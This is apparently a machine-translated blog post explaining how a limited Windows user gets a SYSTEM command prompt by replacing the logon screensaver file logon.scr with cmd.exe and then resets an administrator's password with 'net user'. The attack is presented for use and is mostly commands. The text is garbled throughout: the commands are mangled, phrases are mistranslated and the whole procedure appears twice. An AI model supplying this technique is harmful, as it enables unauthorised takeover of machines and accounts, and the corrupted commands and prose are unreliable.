If you're logged in with a limited account, open a MSDOS command line and type:
cd \ windows \ system32
md tmphack
logon.scr copy tmphack \ logon.scr
copy cmd.exe tmphack \ cmd.exe
the logon.scr
ren cmd.exe logon.scr
exit
Then we have to close session to get as System, as pointed as admin in a comment, if we skip the screensaver as a user will remain in a restricted environment.
This is what we have done a backup of the file cmd.exe and screensavers, then we changed the name of the file that controls the screensaver to cmd.exe, so that you jump the screen saver will then open a command line with administrator privileges without logearnos against the SAM team.
Then you can change the administrator password. For example, if the user is vlan7 administrator and want to set the password tmp, enter the following:
net user vlan7 tmp
cd \ windows \ system32
md tmphack
logon.scr copy tmphack \ logon.scr
copy cmd.exe tmphack \ cmd.exe
the logon.scr
ren cmd.exe logon.scr
exit
Then we have to close session to get as System, as pointed as admin in a comment, if we skip the screensaver as a user will remain in a restricted environment.
This is what we have done a backup of the file cmd.exe and screensavers, then we changed the name of the file that controls the screensaver to cmd.exe, so that you jump the screen saver will then open a command line with administrator privileges without logearnos against the SAM team.
Then you can change the administrator password. For example, if the user is vlan7 administrator and want to set the password tmp, enter the following:
net user vlan7 tmp
0 comments:
Post a Comment